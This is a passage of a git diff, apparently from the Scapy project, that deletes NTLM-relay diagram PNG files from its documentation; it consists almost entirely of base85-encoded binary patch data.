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 Dcr^|O diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_smb2.png b/doc/scapy/graphics/ntlm/ntlmrelay_smb2.png deleted file mode 100644 index f9931227fd236cab82f6cb535f912f447bb5ea2c..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 240337 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 